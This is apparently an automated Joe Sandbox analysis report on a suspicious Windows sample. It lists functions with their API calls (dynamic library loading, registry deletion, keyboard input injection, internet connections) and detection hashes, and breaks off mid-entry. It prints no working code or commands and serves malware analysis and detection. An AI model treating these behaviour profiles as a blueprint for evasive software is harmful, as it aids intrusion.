                                    • Opcode Fuzzy Hash: 1a149abc8b9a6f92a72b2ee17852a452748f5537d8fbd20dc9042b3b3b4e9939
                                    • Instruction Fuzzy Hash: DED0A730500B12DFC7208F65FC0860576FCAB04701B10C42DE44AD2590E7B0CCC08A10
                                    Function 00170564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0017052F,?,001706D7), ref: 00170572
                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00170584
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                    • API String ID: 2574300362-1587604923
                                    • Opcode ID: 3d14b4556aaa8ecb1a55f0c7929b076acbc136871e02669c356cf6c11af466aa
                                    • Instruction ID: ec85391a228f088e06af1ce2223d3d85c7c51ef38b12ba9b4b2200390f8a758d
                                    • Opcode Fuzzy Hash: 3d14b4556aaa8ecb1a55f0c7929b076acbc136871e02669c356cf6c11af466aa
                                    • Instruction Fuzzy Hash: BCD0A730440712DFC7205F35FC08B0677FCAB08300B10C52DE845D2590E7B0C9C08B20
                                    Function 0018ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0018ECBE,?,0018EBBB), ref: 0018ECD6
                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0018ECE8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                    • API String ID: 2574300362-1816364905
                                    • Opcode ID: 8421729fa19d8bc09186b011e4c74741234607085e47747903dbc5555b13e43e
                                    • Instruction ID: 85798f38f170aed5c7d10b69f8724a10a2d30e592632ea419566fa3d6decc9f1
                                    • Opcode Fuzzy Hash: 8421729fa19d8bc09186b011e4c74741234607085e47747903dbc5555b13e43e
                                    • Instruction Fuzzy Hash: 18D0A734900B239FCB246F65FC4860676E8AB00700B008429F845D2590EFB0C8C08B10
                                    Function 0018BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0018BAD3,00000001,0018B6EE,?,001CDC00), ref: 0018BAEB
                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0018BAFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetModuleHandleExW$kernel32.dll
                                    • API String ID: 2574300362-199464113
                                    • Opcode ID: 76e1a79e8a269e8949188c051f744c399272f4ba66995e5da458767c18854c17
                                    • Instruction ID: cdafb1ca652409c6a0711c789a2bb3a464f33d1bb3a4e817a38cc43e84cb06f5
                                    • Opcode Fuzzy Hash: 76e1a79e8a269e8949188c051f744c399272f4ba66995e5da458767c18854c17
                                    • Instruction Fuzzy Hash: B8D0A930804B229FC734AF2AFC88B5676E8AB00700B00842AE883D3690EBB0C8C1CB10
                                    Function 00193BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00193BD1,?,00193E06), ref: 00193BE9
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00193BFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2574300362-4033151799
                                    • Opcode ID: f9bb0c050ff25b3f1e1ebc0408a0fa19ff2ba3dcea1ec8c040c2e3a48135116e
                                    • Instruction ID: a69d46f7713de498f95d57d237d0afbe4f569fc29dda8a9e6209fd6539bffd36
                                    • Opcode Fuzzy Hash: f9bb0c050ff25b3f1e1ebc0408a0fa19ff2ba3dcea1ec8c040c2e3a48135116e
                                    • Instruction Fuzzy Hash: 45D0A774400F52AFCF205F66FC08657FBF8AB06314B10442AE455E2550E7B0C4C08E10
                                    Function 00169B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ab1bb0b2cf329e1d20bfe96c3ac5330a923e66e58ffb14a5e1a26cb202b158ef
                                    • Instruction ID: 2253b8297b8fa15133383d68633f6d31936927616a397950bbbc8c5e5a625b3f
                                    • Opcode Fuzzy Hash: ab1bb0b2cf329e1d20bfe96c3ac5330a923e66e58ffb14a5e1a26cb202b158ef
                                    • Instruction Fuzzy Hash: 05C15B75A0021AEFCB18CFA4CC84AAEB7B9FF48704F118598E905EB251D731EE51DB90
                                    Function 0018AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 0018AAB4
                                    • CoUninitialize.COMBASE ref: 0018AABF
                                      • Part of subcall function 00170213: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0017027B
                                    • VariantInit.OLEAUT32(?), ref: 0018AACA
                                    • VariantClear.OLEAUT32(?), ref: 0018AD9D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                    • String ID:
                                    • API String ID: 780911581-0
                                    • Opcode ID: 30654616a92ffe6542801691e82a8350c8f0ef69d55c3ad67a4123a333f74a66
                                    • Instruction ID: 07808f0d5219f7315fbc80c2b197e5ca6b5f7948a6bb1ef6c2dc2b971bdcb8a0
                                    • Opcode Fuzzy Hash: 30654616a92ffe6542801691e82a8350c8f0ef69d55c3ad67a4123a333f74a66
                                    • Instruction Fuzzy Hash: 7EA16B752047019FDB14EF64C481B1AB7E5BF98720F448549F99A9B3A2CB70EE44CF86
                                    Function 001691CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyInitString
                                    • String ID:
                                    • API String ID: 2808897238-0
                                    • Opcode ID: 6fc140092633ec1ff231b2ba17de79d90e2a57251136d6ef901ecb0ea334033a
                                    • Instruction ID: 35be758b9b235c599be24225279d7602033d88fc7430f5c13265c9c7fe54d5f4
                                    • Opcode Fuzzy Hash: 6fc140092633ec1ff231b2ba17de79d90e2a57251136d6ef901ecb0ea334033a
                                    • Instruction Fuzzy Hash: 26518134A043069BDB249F79DC95A2EB3EDBF54310F20881FE586CB3E1DB7498908705
                                    Function 0019C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(01755BD0,?), ref: 0019C544
                                    • ScreenToClient.USER32(?,00000002), ref: 0019C574
                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0019C5DA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: f9dae246b2f1a8e662bf61ad44a3241c4857998a485b757a12f12442c0a9d575
                                    • Instruction ID: e84ffcde6eddc839244c1186533f934e50d10c7dd009c7676997ec2840657dd2
                                    • Opcode Fuzzy Hash: f9dae246b2f1a8e662bf61ad44a3241c4857998a485b757a12f12442c0a9d575
                                    • Instruction Fuzzy Hash: D1515D75A00205EFDF10DF68D880AAE7BB6EB55320F118259F9A5DB290D770ED81CB90
                                    Function 0016C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0016C462
                                    • __itow.LIBCMT ref: 0016C49C
                                      • Part of subcall function 0016C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0016C753
                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0016C505
                                    • __itow.LIBCMT ref: 0016C55A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow
                                    • String ID:
                                    • API String ID: 3379773720-0
                                    • Opcode ID: 93a02231bf0802e77d1c0561e906b38939163fe3a0f7f3f75f4ab77e6f7afdc6
                                    • Instruction ID: c6c8e1ec643db285c712aedec38d3b0a8527c14f87a4969153fd2b90104bf3b6
                                    • Opcode Fuzzy Hash: 93a02231bf0802e77d1c0561e906b38939163fe3a0f7f3f75f4ab77e6f7afdc6
                                    • Instruction Fuzzy Hash: 2741A371A00608AFDF25EF54CC56BFE7BB9AF59700F000029FA46A7291DB709A55CBE1
                                    Function 0017390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00173966
                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00173982
                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 001739EF
                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00173A4D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 18bed05b84de8ca1ee88dc8a2bc0e840ce484de1db4f0f77fc5fc17832d777fb
                                    • Instruction ID: 4450edc7663c539c2f946c8d60523684aedcf7302f37335bb75107aea41301e8
                                    • Opcode Fuzzy Hash: 18bed05b84de8ca1ee88dc8a2bc0e840ce484de1db4f0f77fc5fc17832d777fb
                                    • Instruction Fuzzy Hash: 2C415B70E04218AEEF348B64C80ABFDBBB59B55314F04811AF6E9932C1C7B58EC5E761
                                    Function 0019B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                    Download Yara Rule
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0019B5D1
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: cfa8739777b9c86f20b3757276ec08fd90c939cd19200484209bd7a31d7fb1e1
                                    • Instruction ID: 8a287d223d4b54326394ae753c3362c19780a6acaa7b994af322c3bd7825f1c8
                                    • Opcode Fuzzy Hash: cfa8739777b9c86f20b3757276ec08fd90c939cd19200484209bd7a31d7fb1e1
                                    • Instruction Fuzzy Hash: 8031CE74609208FFEF289F18FEC9FA87765AB06320F664211FA51D66E1D770B980CB51
                                    Function 0019D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0019D807
                                    • GetWindowRect.USER32(?,?), ref: 0019D87D
                                    • PtInRect.USER32(?,?,0019ED5A), ref: 0019D88D
                                    • MessageBeep.USER32(00000000), ref: 0019D8FE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    • Opcode ID: 69af84fd9f3cb5235455a22f0781d5333b074dabe367fb6e2fb6dc298bb387c4
                                    • Instruction ID: f8e8a4776375db8d609ae2250a7492fa0e54ee3f46bc0d5e7ab6533d96212dbf
                                    • Opcode Fuzzy Hash: 69af84fd9f3cb5235455a22f0781d5333b074dabe367fb6e2fb6dc298bb387c4
                                    • Instruction Fuzzy Hash: E841AE74A00219EFCF15DF69E884BA97BF5FF49324F1981A9E915DB262D330E981CB40
                                    Function 00173A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00173AB8
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00173AD4
                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00173B34
                                    • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00173B92
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: c2c94e850c1f373058e2c6e53db71070b97f9688d1d238edcf63d8edfa68f91b
                                    • Instruction ID: be39228982ea8a994274205a1e34b4d9b4fe42f3785da336b37e9a8999767048
                                    • Opcode Fuzzy Hash: c2c94e850c1f373058e2c6e53db71070b97f9688d1d238edcf63d8edfa68f91b
                                    • Instruction Fuzzy Hash: F7315B70A00258AEEF358B64CC19BFE7BB59B55310F04825AE8DD932D1C7748F86E761
                                    Function 00164004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00164038
                                    • __isleadbyte_l.LIBCMT ref: 00164066
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00164094
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 001640CA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: f108283a243898b9c6181240ea92fe572511078df7961eb812305452a58e0274
                                    • Instruction ID: 2397fd8b74c9955a77ebcf6eacfd7ccc4e1b6cd220b650d67fde65c249c3b20e
                                    • Opcode Fuzzy Hash: f108283a243898b9c6181240ea92fe572511078df7961eb812305452a58e0274
                                    • Instruction Fuzzy Hash: 6031BC31600226EFDB269F74CC45BFB7BA5BF41310F168529FA658B1A1E731D8A0DB90
                                    Function 0018431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00184358
                                      • Part of subcall function 001843E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00184401
                                      • Part of subcall function 001843E2: InternetCloseHandle.WININET(00000000), ref: 0018449E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Internet$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 1463438336-0
                                    • Opcode ID: 53f8bbf5efda47781187a1370de3b8cbd2865a9cbe54bf4969919b13b8b9eec4
                                    • Instruction ID: e9759464f4e078d1b973818403d2f8e0faf4a0c2d51a5f37798f09f258c07609
